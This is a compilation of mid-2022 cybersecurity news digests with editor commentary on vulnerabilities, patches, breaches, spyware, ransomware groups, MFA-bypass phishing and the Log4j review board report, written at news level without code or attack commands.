  • Attackers are manipulating data related to update activities as well as spoofing who they are to lead you to believe they are a highly trusted contributor who is actively maintaining their code. This can be partly mitigated by making sure that the commits come from someone whose identity has been verified by GitHub when those commits are being made. Don’t wait for the 2023 deadline to enable 2FA on your GitHub accounts. If you digitally sign your code, the “vigilant mode” feature can be used to see the status of all code submitted under that name, aiding the discovery of malfeasance.

Read more in

Microsoft is Investigating Exchange and Outlook Outage

Microsoft is looking into an outage affecting Exchange Online and Outlook. The issue appears to have begun over the weekend. Outlook and Exchange Online users have been reporting that they have had difficulty logging in and sending email. Microsoft says they have identified and resolved the problem.

Note

  • Gee, I wonder how many phishing emails didn’t get delivered? On the serious side, 2FA approaches that rely on sending codes to email addresses are more vulnerable to delivery outages than those that use mobile devices and SMS messages or authenticator apps.
  • Microsoft stated they found a section of network infrastructure performing below acceptable thresholds and rerouted that traffic, as well as restarted services to resolve the issues. In today’s interconnected and interdependent systems required to deliver an online service like these, network performance dips can have a significant impact on service delivery, making it increasingly important to not only understand these relationships, but also to detect and react to issues rapidly.

Read more in

Remove Kaswara Modern WPBakery Page Builder Addons for WordPress Now

The Wordfence threat intelligence team has noted an uptick in attempts to exploit a vulnerability in Kaswara Modern WPBakery Page Builder Addons. The critical file upload flaw was disclosed earlier this year; no fix was released, and the plugin is no longer supported. The Wordfence team is urging WordPress users to remove Kaswara Modern WPBakery Page Builder Addons from their sites.

Note

  • Wordfence released updated firewall rules May 21st and April 21st for the free and Premium/Care/Response versions, respectively. At this point it is unlikely the weakness will be resolved, and Wordfence has seen about 444,000 attempted attacks a day, so it’s time to remove and replace this plugin. Also check your site for the listed IOCs.

Read more in

Juniper Patches Hundreds of Flaws in Multiple Products

Juniper Networks has released fixes for vulnerabilities in multiple products, including Junos Space, Contrail Networking, and NorthStar Controller. Several of the flaws are critical, prompting the US Cybersecurity and Infrastructure Security Agency (CISA) to urge admins to update without delay. Some of the flaw could be exploited to take control of vulnerable systems.

Note

  • The fixes include updates to the underlying CentOS 6.8 shipped with some products to CentOS 7.9. The update to Contrail Networking 21.4.0 addresses 166 vulnerabilities, while the update to Space network management 22.1R1 addresses 31. Several of these vulnerabilities have CVSS base scores of 9.6 or higher, so you’re want to go to the Juniper Security Advisory site and proactively search for your products. Note the CISA advisory simply advises you read the Juniper Security Advisory page and apply relevant updates.
    www.cisa.gov: Juniper Networks Releases Security Updates for Multiple Products

Read more in

Albania’s Online Government Services Hit with Cyberattack

Many Albanian government e-services are unavailable after suffering a cyberattack. The incident was detected on July 15. The government took its systems offline to deal with the attack, just months after moving government services online.

Note

  • While the Albanian government has assured citizens that their data is backed up, it’s not clear that the root cause has been identified or remediated so those backups can be applied. Additionally, it’s been noted these services were only recently being moved online, so it’s likely the full plans for redundancy and resiliency hadn’t been implemented. In today’s climate, you need to start with those defenses in place prior to going live, particularly if you’re operating a government affiliated service. You may also want to add practicing service restoration to your acceptance criteria for going live.

Read more in

Former CIA Programmer Guilty of leaking Vault 7 Data to WikiLeaks

Former CIA software engineer Joshua Adam Schulte has been convicted on charges related to his theft of national defense data and giving it to WikiLeaks. Known as Vault 7, the trove of data included cyber espionage tools the US government uses to infiltrate terrorist and foreign government networks. Schulte could face up to 80 years in prison.

Note

  • The release to WikiLeaks was allegedly motivated by an abject hatred for the CIA. With that level of access, Schulte would not only have had to obtain a security clearance, but also sign enough NDA documents assuring his fate in the event he violated them. Schulte also was found to have child exploitation material on his laptop, so he’s going to be busy paying his debt to society for a very long time.

Read more in

Attackers Targeting Elastix VoIP Systems to Install Web Shells

Researchers from Palo Alto Networks Unit 42 say that attackers are targeting Elastix VoIP telephony servers. The threat actors “implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target’s Digium phone software.” The researchers believe the attackers may be exploiting a critical remote code execution vulnerability in FreePBX with restapps installed; a fix has been available for that flaw since late 2021.

Note

  • Make sure you’re running the updated FreePBX software, ingest the IOCs in the Unit 42 blog, and check for unexpected new root accounts or scheduled tasks.

Read more in

Citizen Lab: Pegasus Used Against Thai Pro-Democracy Activists

A report published by researchers from the University of Toronto’s Citizen Lab and Digital Watch says that at least 30 Thai pro-democracy activists were targeted with NSO’s Pegasus Spyware. The infections occurred between October 2020 and November 2021. The attacks were revealed when Apple began sending notifications to iPhone users being targeted by the spyware.

Note

Make sure that your users are running the latest iOS versions which close the attack vector used by Pegasus. If you have users who may be targeted, consider the Apple’s Lockdown Mode which will be released with iOS 16 this fall.

Read more in

Retbleed Vulnerability Fixed in Linux Kernel

The Retbleed speculative execution attack vulnerability has been fixed in the Linux kernel, according to Linus Torvalds. The release of Linux kernel version 5.19 has been delayed for a week due in part to the complexity of the Retbleed vulnerability, and in part to two other development trees that requested extensions.

Note

  • The btrfs file system and firmware for Intel GPU controllers branches also called for a delay. It is likely that version 5.20 of the kernel will be chosen as the next long-term support release.

Read more in

L3Harris ends talks to buy NSO Group’s surveillance technology

Looks like U.S. defense firm L3Harris is dropping its bid to buy NSO Group’s surveillance technology — the maker of the mobile spyware Pegasus. It comes not long after the White House warned any deal raised “serious counterintelligence” concerns because of the company’s close ties with the Israeli government, months after NSO was put on a U.S. sanctions list, and was almost certainly the deal’s death knell. The Guardian’s @skirchy reports some government-insider bickering over the deal, but without the blessing from the U.S. government, L3Harris had no way but to back away from the table, leaving NSO’s future in doubt.

Read more in

A key fob bug lets anyone remotely unlock and start Honda cars

The Drive: A bug in Honda key fobs, which researchers are calling Rolling Pwn, allows anyone to wirelessly steal authentication codes from a Honda car owner’s key fob and be used to remotely unlock and start a Honda car. The Drive verified the bug and tried it out on a 2021 Honda Accord using a software-defined radio to capture and replay the stolen key fob codes. Honda initially flip-flopped on whether it was going to fix the bug, since rolling out updates to non-internet connected key fobs isn’t easy at all — the car maker said it plans to have an “improved system” for future vehicles.

Read more in

Rob Stumpf tweet: "I was able to replicate the Rolling Pwn exploit using two different key captures from two different times. So, yes, it definitely works."

Amazon gave Ring videos to police without owners’ permission

Ring gave over 11 people’s information without a warrant and without their consent so far this year, per a letter from a Ring executive to lawmakers this week. Ring video doorbells are always on and recording, and the Amazon-owned unit has cozy relationships with over 2,100 police departments across the United States. But police are also taking advantage of “exigent” circumstances that allow Ring to turn over video footage without legal process in emergency settings — but that’s a broad category and Amazon doesn’t spell explicitly what counts as an emergency. Worse, Ring doesn’t disclose how many times it’s given over data in allegedly emergency situations. According to Ring’s latest transparency report, Ring processed 3,147 legal demands last year — up 65% on the year earlier — and turned over content data in about four out of 10 cases. But still no word on those emergency figures… it’s almost like Ring doesn’t want you to know.

Read more in

‘Vault 7’ leaker found guilty after massive leak of CIA secrets

Former CIA engineer Joshua Schulte has been found guilty in all nine charges filed against him over what’s been claimed is the biggest theft of classified information in CIA history. Schulte leaked a vast trove of hacking tools to WikiLeaks, which published the files as “Vault 7”. The tools included zero-day exploits able to hack into iPhones, Android devices, and bug the microphones embedded in internet-connected televisions. The SDNY, which prosecuted the case, flat-out called Schulte’s leak “espionage,” which could lead to further fallout for WikiLeaks. The New Yorker had a great story a month ago on how the leak went down.

Read more in

European Central Bank head targeted in hacking attempt

Associated Press: Here’s a pretty brazen social engineering attempt on one of the world’s most powerful financiers: Christine Lagarde, head of the European Central Bank, was “recently” targeted by a hacking attempt but was “halted quickly.” Turns out someone spoofed former German chancellor Angela Merkel’s cell phone number and sent a text message to Lagarde asking her to send back an authentication code, which would have allowed the hackers to create a WhatsApp account in Lagarde’s name, according to Reuters ($). It’s not clear who was behind the attempt.

Read more in

Here’s how North Korean operatives are trying to infiltrate U.S. crypto firms

Here’s a deeper dive by @snlyngaas on how North Korean hackers are posing as tech workers and getting hired at crypto-related companies to ultimately steal cryptocurrency funds and assets to fund Pyongyang’s nuclear weapons program. “These guys know each other. Even if a particular IT worker isn’t a hacker, he absolutely knows one,” said one former FBI intelligence analyst. “Any vulnerability they might identify in a client’s systems would be at grave risk.” Read more: Here’s how North Korean operatives are trying to infiltrate US crypto firms

CISA urges federal agencies to patch Windows bug actively exploited

CISA has ordered all federal civilian agencies to patch a Windows escalation of privilege bug because Microsoft says there is evidence that the bug is being actively exploited. The bug affects Windows 7 and Windows Server 2008 and later, and “allows an attacker to execute code as SYSTEM, provided they can execute other code on the target,” per Trend Micro. Microsoft patched the bug, tracked as CVE-2022-22047, as part of its regular Patch Tuesday updates, but CISA warned agencies to act before August 2. Read more: CISA adds Windows bug to exploited list, urges agencies to patch by August 2

How a GOP-led Congress might change cybersecurity

With the possibility of the Republicans taking Congress at the midterm elections later this year, Politico looks at how cybersecurity — although a rare area of bipartisan compromise — would fare under GOP leadership, and how cybersecurity funding and CISA’s budget will likely be cut. @ericgeller’s tweet thread is a helpful tl;dr. Read more: After key retirements, GOP poised to adopt more combative cyber agenda

Reverse keyword warrants face first major legal challenge

FOIA lawyer @bethbourdon had a great tweet thread looking at reverse keyword warrants, a way in which law enforcement demands that Google provides information on anyone who searched a particular keyword at a given moment in time — such as before a crime was committed. These warrants are highly controversial because they can, just like geofence warrants, ensnare entirely innocent people. As such, these reverse keyword warrants are now subject to a legal challenge that could determine their constitutionality. NBC News has a good piece on where the court case is, and how these kinds of warrants could — and likely will — be used now that Roe v. Wade has been overturned. Read more: Reverse Keyword Warrant Challenged After Cops Asked Google To Search Millions Of People’s Data Multiple Times

A ransomware attack on a debt collection firm is one of 2022’s biggest health

A little-known debt collection firm called PFC was hit by a ransomware attack that affected more than 650 healthcare organizations and facilities across the U.S. In a filing with HHS’ Office of Civil Rights, which enforces the HIPAA privacy and security rules, PFC said 1.91 million patients are affected. That’s just shy from the 2 million affected by a separate breach affecting a medical imaging company in March 2022. Read more: A ransomware attack on a debt collection firm is one of 2022’s biggest health data breaches

macOS sandbox escape discovered and patched

Microsoft found and published a blog this week uncovering a sandbox escape in macOS, designed to keep app processes and data separate and isolated from one another. The bug could be used to “gain elevated privileges on the affected device or execute malicious commands like installing additional payloads.” Read more: Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706

New phishing campaign skirts MFA

Ars Technica has a write-up on a new phishing campaign that’s targeted at least 10,000 organizations since September and can hack users even with multi-factor authentication enabled. The attack works like a man-in-the-middle attack but using a proxy site run by the attackers. The user enters their credentials on a phishing page, the page passes the credentials to the real server that the user is trying to login to, which returns a session token letting the user log in. But the attackers copy the session token as it’s sent back to the user via the proxy site. The user logs in, but the attacker now has the user’s session token in hand, allowing the attacker to log in as that authenticated user. Microsoft’s MSTIC explains more in a blog post.

A screenshot showing the process in which attacker steal session tokens by way of a proxy-in-the-middle server.

FTC calls BS on anonymized data

The Federal Trade Commission warned this week that it is “committed” to fully enforcing the law against the illegal sharing of highly sensitive location and other health data, especially in light of the overturning of Roe v. Wade. The FTC said apps and services often make claims that data is “anonymous” or “has been anonymized,” but that these claims are often deceptive or untrue. Even when data is said to be anonymized, it can often — very easily — be linked to real people with other supplemented data (which companies either have or can easily get, thanks to advertising IDs), explains @karlbode. “Companies that make false claims about anonymization can expect to hear from the FTC,” the government agency said. Read more: Location, health, and other sensitive information: FTC committed to fully enforcing the law against illegal use and sharing of highly sensitive data

Log4j bug becomes ‘endemic,’ review board finds

CISA’s Cyber Safety Review Board, the 15-member panel founded last year to help understand and improve the government’s approach to cybersecurity, published its inaugural report into the Log4j vulnerability, which went wild ahead of last December’s holiday season. The board’s findings show that although the bug was discovered and reported by a cloud engineer at Alibaba, one of China’s biggest cloud providers, the board found no evidence that China used its advanced knowledge of the bug to exploit networks. But the board warned that Log4Shell, as the bug became known as, has become an “endemic vulnerability,” meaning unpatched versions of the omnipresent software could be with us for the next decade or so. Luta Security, run by @k8em0, has a blog post with guidance and recommendations for organizations. And check out @argvee, the board’s deputy chair, who has a tweet thread on the findings.

Dozens of Lenovo laptop models affected by UEFI flaw

Dozens of Lenovo laptop models are vulnerable to a firmware flaw that allows attackers to install malware that’s virtually impossible to detect or remove, per Ars Technica. The laptop maker released updates for the three flaws that can be exploited during the boot process, which can be used to gain persistence even if the operating system is wiped and reinstalled. Read more: Vulnerabilities that could allow undectable infections affect 70 Lenovo laptop models

Chinese APT targeted White House reporters ahead of Jan. 6 insurrection

In the days preceding the January 6 attack on the US Capitol, Chinese state-sponsored hackers changed the targets of their email phishing campaigns to go after US political and national security reporters, security firm Proofpoint said in a report published on Thursday.

The company linked the campaign to a group it calls TA412, also known as Zirconium and APT31, and described the attacks as “a very abrupt shift in targeting.”

The sudden change in targeting from TA412, which typically goes after diplomatic targets, suggests the group may have anticipated the turmoil surrounding the transfer of power in the US government, picking up on hints and threats left online on forums and social media by Trump supporters.

And Proofpoint said that TA412 didn’t go just after any natsec reporters but specifically focused on “Washington DC and White House correspondents,” the journalists who would have had their finger on the pulse of that day’s events.

Proofpoint only saw the phishing campaign and was not able to tell if any were successful, but said that TA412 returned to target reporters later in the year, but this time the ones covering cybersecurity, surveillance, and privacy issues with a focus on China.

TA412 also carried out a third campaign against US media organizations in February this year, and this time they targeted the newsrooms reporting on political topics, with the group most likely trying to gather information shared by US officials with reporters on the US’ possible involvement in the rising tensions between Russia and Ukraine, tensions that eventually blew over later that month, when Russia invaded Ukraine.

But Proofpoint said that Chinese hackers weren’t the only ones engaging in campaigns against reporters and media organizations over the past year and a half. For example, Proofpoint said that North Korean hackers also targeted reporters who wrote articles criticizing the country’s leader, while Iranian and Turkish threat groups tried to compromise the social media accounts of numerous reporters and newsrooms.

All in all, Proofpoint argues that the recent attacks highlight the risks facing journalists and other members of the news media, who are more attractive targets for cyberspies since they might not always benefit from the same training and IT resources that government officials might receive, and would be easier to compromise. Once compromised, reporter accounts can then be pilfered for information on sources and past interactions with government officials, or they can be used to launch new attacks against officials or sources, taking advantage of existing trust relationships.

CIA Vault7 leak

Joshua Schulte, the former CIA employee who leaked the Vault7 files to Wikileaks, was found guilty on all counts following a retrial. Schulte, who represented himself, claimed to the end that he was made a scapegoat by US authorities, even if extensive and multiple reports portrayed him as hot-headed, ego-centrical, and self-entitled. A sentencing date was not set as Schulte is also on trial for child pornography possession and transport charges in a separate case.

OPM breach settlement

Victims of the 2014 and 2015 OPM data breaches are expected to receive about $700 each, while victims who can prove extensive damage are eligible for $10,000. The decision comes after several class-action lawsuits against the US government were consolidated last month into one case, which was settled for $63 million, per The Record.

Bandai Namco confirms ransomware attack

Bandai Namco, the Japanese gaming company behind the hit-game Elden Ring, confirmed this week that they were hacked. The company’s admission comes after the AlphV ransomware gang listed the company on its leak site earlier this week.

LendingTree breach

Online lending company LendingTree formally disclosed a security breach almost a month after a threat actor dumped the details of more than 200,000 of its users on an underground cybercrime forum. Leaked details included customer names, physical addresses, phone numbers, emails, IP addresses, credit scores, and various loan application details. In a letter filed with the California OAG, the company said the breach occurred because of a vulnerability on its website that has now been patched. LendingTree is currently facing a class-action lawsuit following the breach.

Another Clearview AI fine

After being fined more than £7.5 million ($9.4 million) in the UK and another €20 million ($20 million) in Italy, facial recognition company Clearview AI received the third fine in Europe, another €20 million ($20 million) from Greek authorities.

Microsoft Salus is now open source

Microsoft has officially open-sourced this week its Salus app, an internal tool that the company has used for the past months to generate software bill of materials (SBOM) for its internal projects. SBOM files are lists of libraries used inside a software application. They allow companies to track if an app uses third-party code and are incredibly useful when a vulnerability in these third-party libraries is disclosed, as it allows the company to easily identify which of its own apps are also impacted.

DoT comes to Windows

Support for the DoT (DNS-over-TLS) protocol is now available for Windows Insiders users, Microsoft said this week.

QWACs are bad, mkay

Mozilla has launched a public campaign to raise awareness of the EU’s terrible plan to force browser vendors to support Qualified Website Authentication Certificates (QWACs), a new type of digital certificate. Mozilla, academics, and security experts say that QWACs are similar to Extended Validation certificates that browser makers have stopped supporting because of their lack of actual security benefits. But more importantly, Mozilla says that an EU regulatory body should not be telling browser makers what technical solutions to support, especially since their idea is actually a step back for user security and only a money-grab for certificate authorities (CAs).

Russia looking to impose fines for data breaches

The Russian government is working on a law that will impose turnover-based fines on companies that suffer data breaches that expose personal user information, according to a report from the Russian Legal Information Agency. Currently, legal entities face fines of 500,000 rubles (~$8,500) for the leak of personal data, but if the new proposed bill passes, fines will be calculated as a percentage of a company’s revenue.

First DHS Cyber Safety Review Board report

In its first-ever report published on Thursday, the DHS Cyber Safety Review Board concluded that the Log4j vulnerability disclosed last year would pose issues to US organizations for years to come. To deal with this problem, the board issued 19 recommendations o deal with the issues, such as the implementation of software bill of materials (SOBM) schemes and increasing investment in open-source programs, many of which are the core of many government and private sector networks. [Additional coverage in The Record and in Dmitri Alperovitch’s Twitter thread below]

US senators propose crackdown on shady VPNs

Two Democrat senators have asked the FTC to look into the deceptive practices of VPN companies. The two want the FTC to look at how VPN companies use false or misleading claims about user anonymity in their ads, the sale of user traffic data to third parties, and if the companies disclose when they share user data with law enforcement agencies.

Iran puts the entire country in Safe Search mode

Several Iranian users reported on Wednesday that Iranian internet service providers started replying to DNS queries for the main Google.com domain with the Lock SafeSearch URL of forcesafesearch.google.com. This is a known feature of the Google search engine that’s usually employed in controlled corporate environments, where companies prevent users from searching for inappropriate content. Apparently, this is also the second time the Iranian government has done this.

KillNet

Intel471 has a report out on the operations of pro-Russian hacktivist group KillNet and its recruitment, tactics, techniques, and procedures.

GhostSec

On the same note, CyberInt published a report on GhostSec, a hacktivist group founded back in 2015, which joined the “Russo-Ukrainian hacktivist war” on the side of Ukraine.

Infostealer market overview

Threat intel company KELA has published an overview of the current underground market for infostealer malware and its top players, like Redline, Racoon, AZORult, Mars, BlackGuard, META, Arkei, Vidar, Ginzo, Eternity, 7.62mm, Inno, TigersTeam, and the Aurora Project.

Distribution of bots affected for sale in Russion Market in January 2022 - July 2022, by stealer, as collected by KELA's systems.

Unity merges with adware maker

Apparently, Unity for Games decided to merge with a company accused of spreading adware.

WPBakery attacks

WordPress security firm Wordfence reported on Wednesday seeing a sudden spike in attacks targeting a vulnerability (CVE-2021-24284) in Kaswara Modern WPBakery Page Builder Addons, a page builder plugin for WordPress sites from WP developer WPBakery. The vulnerability, which did not receive a patch, can be used to upload malicious PHP files to an affected website, leading to code execution and complete site takeover.

Mantis DDoS botnet

Cloudflare said that a botnet named Mantis was responsible for the record-breaking DDoS attack that hit its servers last month. Cloudflare says the Mantis botnet is an evolution of the older Meris botnet, but unlike its predecessor, Mantis can infect a wider range of devices, and not just MikroTik routers. The company estimated the current size of the Mantis botnet at only 5,000 bots, meaning the botnet can pack a strong punch even from a small base, hence the reason they named the botnet after the Mantis shrimp, which can also generate a lot of power from their tiny frame to spear their prey.

New Autolycos malware

Evina security researcher Maxime Ingrao discovered this week eight applications uploaded on the official Google Play Store that contained a new Android malware strain named Autolycos. Ingrao said the apps were downloaded more than 3 million times and that Autolycos’ main purpose was to secretly subscribe infected users to various premium services and generate a profit for the threat actor through an affiliate kickback scheme. According to Evina, the malware family originated in South Africa and is now proliferating in Nigeria.

North Korean hackers linked to H0lyGh0st ransomware

Microsoft said that it found evidence to link the operators of the H0lyGh0st (HolyGhost) ransomware to a group of North Korean hackers it tracks as DEV-0530, and which may be connected to a larger group known as the Andariel APT (PLUTONIUM, DarkSeoul). Microsoft said it saw the group deploy its payload on the networks of small businesses in multiple countries since June 2021. This is not the first time that North Korean hackers have been linked to ransomware operations after they’ve also been linked to strains like WannaCry, VHD, Tflower, BEAF, PXJ, ZZZZ, CHiCHi, and Maui.

Lockbit dominates Q2 2022

According to reports from both CyebrInt and Digital Shadows, the Lockbit gang was the most active ransomware group in Q2 2022.

Top active groups per Quarter, with overall Q1 vs Q2 comparison.

Vice Society group

Sekoia’s threat intel team has published a report on Vice Society, a cybercrime group that deploys ransomware created by other groups (such as Zeppelin and HelloKitty) but uses its own leak site to extort victims. Sekoia said that based on its analysis, it believes the group’s members are “English native speakers.”

BlueSky ransomware

CloudSEK researchers have published some initial details and IOCs on the new BlueSky ransomware, first spotted this year in May and believed to be connected to the former Conti gang. CloudSEK also said it believes to have tracked down the ransomware’s operator to someone located in Krasnodar, Russia.

Use of cryptocurrency mixers rose in 2022

Blockchain tracking company Chainalysis said that cryptocurrency mixing services saw a huge spike in usage this year as cybercrime and nation-state groups have extensively used them to launder ill-gotten funds.

Illicit addresses account for 23% of funds sent to mixers so far in 2022, up from 12% in 2021.

CERT-FR MISP feed

The CERT France team has released a free public MISP feed with indicators of compromise (IOC) labeled TLP:WHITE for free distribution.

Qakbot evolves

Security researchers from Zscaler said in a report this week that the rising number of infections seen in recent months from the Qakbot (QBot, QuackBot, Pinkslipbot) botnet can be traced back to the deployment of several new evasion detection techniques. This includes the use of ZIP files to hide their payloads, new code obfuscation methods, and the use of unknown file extensions (OCX, ooccxx, dat, or gyp) to deliver payloads.

Backdoorit & Caligula

The Avast team published a report on the Backdoorit RAT and the Caligula IRC DDoS bot, both malware strains written in the Go programming language.

Mysterious campaign

Trellix has a report out on a threat actor malspam campaign targeting government agencies of Afghanistan, India, Italy, Poland, and the US since 2021. The final payload in these attacks is either AysncRAT or LimeRAT. According to clues left by the attacker, Trellix believes the threat actor may be from South Africa.

Trellix has a report out on a threat actor malspam campaign targeting government agencies of Afghanistan, India, Italy, Poland, and the US since 2021.

Confucius APT

Chinese infosec firm Antiy Group has published a report on a recent campaign of the Confucius APT that targeted Pakistani government and military institutions. Past reporting has found links between Confucius and Patchwork, a well-known Indian threat actor. Some insights from one of Trend Micro’s APT experts.

Sidewinder compromises Pakistani Air Force

On a similar note, Check Point said it had “evidence suggesting that Pakistan Air Force’s Headquarters was a victim of a successful attack conducted by Sidewinder, a suspected India-based APT group.” The compromise allegedly took place in May 2022, according to the security firm.

Transparent Tribe

Now, in direct opposition, Cisco Talos also published a report on recent attacks carried out by Transparent Tribe, a Pakistani APT that has been targeting Indian educational institutions, showing that these two countries continue to hack each other with no respite.

macOS sandbox vulnerability

After releasing its own security updates on Patch Tuesday, Microsoft also took great care to disclose a vulnerability in Apple’s macOS that could be exploited to escape the App Sandbox service and run malicious code on a system. While the bug (CVE-2022-26706) was fixed in May, Microsoft’s team published a technical report on it yesterday.

70+ Lenovo laptop models impacted by UEFI firmware bugs

ESET security researcher Martin Smolar has discovered three buffer overflow vulnerabilities in the UEFI firmware of Lenovo Notebook devices. The vulnerabilities allow threat actors to hijack the boot sequence and take over the device’s OS. More than 70 Lenovo models are impacted, and the Chinese vendor released patches this week.

New browser side-channel attack

A team of academics from the New Jersey Institute of Technology published details this week about a new deanonymization attack that targets web browsers and can disclose past sites a user has visited. The gist of the research is that a threat actor who manages to lure a victim to a malicious site can link their IP address with details such as usernames or emails used on popular websites the victims are currently still logged in. The research team said the attack works because the researchers pull data from the user’s CPU cache and not the browser cache, and by doing so, they are bypassing many browser-level isolation mechanisms, including cross-origin resource policies (CORP), cross-origin opener policies (COOP), and SameSite cookie attributes. The NJIT team said they tested the attack on both desktop and mobile browsers running on various CPU microarchitectures (Intel, Apple M1, Qualcomm CPUs), operating systems (Windows, macOS, Android), different browser engines (Chrome, Safari, Firefox, Tor Browser), and with multiple services (Google, Twitter, LinkedIn, TitTok, Facebook, Instagram, Reddit).

RCE in Blitz.js

SonarSource researchers published a write-up for CVE-2022-23631, a prototype pollution vulnerability in the Blitz.js JavaScript framework that can lead to remote code execution.

Decade in vulnerabilities

A Trustwave report looks at the top 10 worst vulnerabilities from the last decade, including stuff like BlueKeep, Heatbleed, EternalBlue, and others.

Honda to redesign cars to address Rolling PWN

Japanese carmaker Honda said it plans to redesign the key fob technology in its new vehicles to address a recently-discovered vulnerability known as Rolling PWN. Disclosed last week, the vulnerability can be used to unlock and start the engines of all Honda cars made since 2012.

ATT&CKcon 3.0

The recorded presentations from the ATT&CKcon 3.0 security conference are now available online.

New tool

German security firm RedTeam Pentesting has open-sourced and released Pretender, a cross-platform tool for executing machine-in-the-middle (MitM) attacks inside Windows networks.

Web tool launch

BinaryNinja launched this week Decompiler Explorer, a web service that lets you compare the output of different decompilers on small executables.

Amazon Acknowledges Sharing Ring Data With Police Without Informing Users

Amazon has provided US law enforcement agencies with data from Ring video doorbells nearly a dozen times since the start of 2022. While Amazon’s policy states that police may not view recordings without the explicit permission of the devices’ owners, that policy is superseded by subpoenas and emergency requests. Amazon confirmed that they had shared Ring footage in a letter responding to questions posed by US Senator Ed Markey (D-Massachusetts).

Note

  • Amazon’s response to the Senator shows Amazon has evolved to a balanced response between user demands for privacy and law enforcement (and often user) demands for using stored doorbell video to catch thieves and criminals. Worth showing your Chief Legal Counsel if your company provides any product or service storing such data. From a Work at Home security viewpoint, Amazon Ring is the largest vendor but only has about a 15% market share. The top 5 vendors overall only represent 30% of the market – 70% of devices are sold by dozens of tiny vendors who are likely not being as diligent as Amazon. The good news from WAH point of view is many of the smaller ones don’t offer long cloud storage of video/audio but most will over time. WAH security awareness should include tips on how employees can minimize risk.
  • Make sure that you understand who can view your doorbell or other security footage, and under what conditions. And this reminds us that they have direct access to the data to override those processes if needed. Amazon has their Neighbors Public Safety Service which allows users to elect to share footage with law enforcement as well as a process where they will share footage in response to a court order or emergency request. In this instance, Amazon (Ring) made a good faith determination that sharing the footage was warranted, but those requests cannot be linked to a court or emergency order. If you’re uncomfortable consider solutions where the footage is stored locally and only you have access to view it.
  • Police and other government agencies will always look to gather whatever data they can when investigating crimes or individuals. That is why strong privacy laws are so important to ensure that any such access is provided in a controlled, informed, and transparent manner and it is beyond time that the US introduced strong federal privacy laws. Privacy laws are not there to hinder police or government agencies, they are there to protect the human rights of us all.
  • Their “terms of service” almost universally permit holders of data to respond to “lawful” requests, i.e. warrants and subpoenas. If that is a problem for you, then do not share the data. Holders of data should be transparent about the number of such requests it receives and how they responded. Such transparency is essential to maintaining the necessary level of public trust.

Read more in

US Cyber Safety Review Board: Log4j Will be an Issue for Years to Come

The US Department of Homeland Security’s (DHS) Cyber Safety Review Board (CSRB) has determined that the Log4j vulnerabilities are going to pose a risk for at least a decade. CSRB’s report, Review of the December 2021 Log4j Event, includes recommendations for user to help mitigate the risks.

Note

  • Log4j is a bit of a tricky vulnerability. Initially, we saw a big surge in scans for the vulnerability and these scans dropped off quickly as attackers realized that the standard attack tools only worked for a few specific applications. In many cases attacks against log4j need to be customized for a particular application based on how it where it uses log4j. But the application is still vulnerable and as more specific exploits are released for these use cases, we will see new flare ups.
  • The good news quote in the CSRB’s first report since being established: “At the time of writing, the Board is not aware of any significant Log4j-based attacks on critical infrastructure systems. Somewhat surprisingly, the Board also found that to date, generally speaking, exploitation of Log4j occurred at lower levels than many experts predicted, given the severity of the vulnerability.” This first output from the CSRB was focused on a vulnerability vs. an incident. The idea of a Cyber Safety Review Board came from trying to get similar “lessons learned” that have for years come from the US National Transportation Safety Board that investigates plane, train, vehicle, etc. crashes. The “Organizational Reponses” section of this initial report is just a few paragraphs of lessons learned. The Enterprise Risk Management recommendations section has a bit more, but at a much higher level. I’d like to see the next CSRB report focus on an investigation of one of the continuing stream of successful attacks we are always commenting on in NewsBites.
  • As we are still having breaches due to SQL injection and other vulnerabilities identified decades ago I have no doubt that we will still be dealing with recently discovered vulnerabilities for decades to come, and yes I won’t be surprised to still see SQL injection attacks over the coming decades. Security engineering needs to become the default for all systems and applications from their very beginning and not something added on as a nice to have or to keep regulators happy.
  • The first task on the CSRB agenda was a report on Log4J. The executive summary includes a number of recommendations which apply to more than just Log4j, even if you’re not developing applications, to include being aware of the components you’re integrating, keeping good software inventories so you know where those components are located. SBOMs are a step to aid this: remember that they represent a point-in-time, so make sure they are maintained/updated.

Read more in

Phishing Campaign Bypasses MFA

Researchers from Microsoft has discovered a phishing campaign that can bypass multi-factor authentication (MFA). The attacks are targeting Office 365 users; more than 10,000 organizations have been targeted since September 2021. Microsoft says the campaign uses adversary-in-the-middle phishing sites to steal passwords, hijack sign-in sessions, and bypass the authentication process.

Note

  • At the SANS New Threats and Attacks keynote presentation at the RSA Conference, SANS instructor Katie Nickels covered MFA Bypass attacks but also said “Multifactor auth remains an incredibly powerful force for security. You should still use it.” Successful attacks (like airplane crashes) make the headlines, blocked attacks (like safe plane landings) do not – you will not see publicity around the 99.9% of credential stealing attacks that don’t work if MFA is done right. MFA does have to be done right, Katie points that out, and even done right doesn’t mean the end of successful attacks. But raising the bar against credential stealing that takes advantage of reusable passwords is mandatory if you are even talking about achieving anything close to “zero trust.”
  • The attack isn’t particularly new, but the write up does also cover what attackers are doing after the phishing is successful. Good read and maybe a motivation to not allow “remember browser” cookies to bypass MFA for critical applications.
  • Just to clarify, ‘advisory-in-the-middle’ attacks have been going on for almost twenty years now, nothing new. Second, this is not an attack specifically against MFA. In this version, the attackers’ goal is to steal the session-cookie, not the actual authentication credentials. In other words, the attackers wait for / assist you to authenticate first, steal the authenticated session cookie and then replay that to gain access. A similar attack happens with “trojaned” M365 plugins that you approve and install AFTER authenticating to your M365 account. Strong authentication mechanisms like MFA are highly effective, something I still strongly recommend and use actively for my own personal accounts. The Microsoft post has good details about how the attack works and mitigation steps.
  • While we have been raising the bar by implementing some form, any form, of MFA, attackers have been working on how to exploit these efforts. You should be starting to hear the term phishing-resistant MFA. These leverage both cryptographic (public-private key pairs) as well as verification the requesting site is genuine. FIDO2 is one example. From an infrastructure perspective, pursue a strategic roadmap from your current MFA to phishing resistant MFA, while taking tactical steps to phase out SMS or phone call MFA quickly. From an end-user perspective, continue to educate them on being skeptical and checking that the site they are interacting with is truly genuine.
  • MFA has raised the bar for criminals to hijack user accounts but it should not be seen by itself to be a panacea. Other mitigations should be put in place to reinforce the protection offered by MFA solutions. The Microsoft blog included in the links to this story offers some very good additional mitigation steps to help defend against this type of attack.
  • Unlike the fraudulent re-use of passwords, which is cheap and enables session creation, attacks against strong authentication are expensive and only enable session stealing. We must not permit the limitations of a security mechanism to discourage its use, the perfect to be the enemy of the good.

Read more in

Lenovo Releases Firmware Updates to Fix RCE Flaws

